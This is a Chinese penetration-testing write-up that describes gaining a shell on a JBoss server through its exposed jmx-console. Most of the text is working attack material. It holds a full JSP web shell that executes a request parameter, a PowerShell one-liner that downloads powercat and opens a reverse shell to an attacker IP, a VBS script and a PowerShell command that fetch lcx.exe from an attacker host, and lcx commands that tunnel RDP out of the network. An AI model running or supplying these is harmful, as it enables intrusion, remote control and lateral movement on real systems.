日期:
来源:菜鸟学信安收集编辑:whoamiaa
一.前言
最近做渗透测试中遇到一个jboss的站,在其中学到一些在乙方工作挺有用的技巧(这次测试是进过授权测试)在次分享一下
二.信息收集
先通过namp进行扫描,同时进行目录扫描,发现8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/
三.漏洞利用
全局搜索jboss.system,点击进入
站上
//gg.jsp
<%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
</head>
<body>
<%
Runtime runtime = Runtime.getRuntime();
Process process =null;
String line=null;
InputStream is =null;
InputStreamReader isr=null;
BufferedReader br =null;
String ip=request.getParameter("cmd");
try
{
process =runtime.exec(ip);
is = process.getInputStream();
isr=new InputStreamReader(is);
br =new BufferedReader(isr);
out.println("<pre>");
while( (line = br.readLine()) != null )
{
out.println(line);
out.flush();
}
out.println("</pre>");
is.close();
isr.close();
br.close();
}
catch(IOException e )
{
out.println(e);
runtime.exit(1);
}
%>
</body>
</html>
python -m SimpleHTTPServer 8589
四.进一步渗透
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd
想到了永恒之蓝打一波,先看看打没打永恒之蓝的补丁,和看看系统信息,发现打了很多补丁
网址:https://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp
查找永恒之蓝补丁编号进行比对发现该目标机器并没打补丁
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\Windows\Temp\2.txt",2 >>download.vbs
powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:\Windows\Temp\2.txt')
//被攻击机器
lcx -slave 自己外网ip 51 内网ip 3389
//攻击机器
lcx.exe -listen 51 9090
lcx -tran 53 目标主机ip 3389
总结
虽然暂时没有成功,但从中还是学到许多渗透知识,也明白了实战能提高许多技术。不足就是知识不够,还需努力。
作者:whoamiaa,来源:先知社区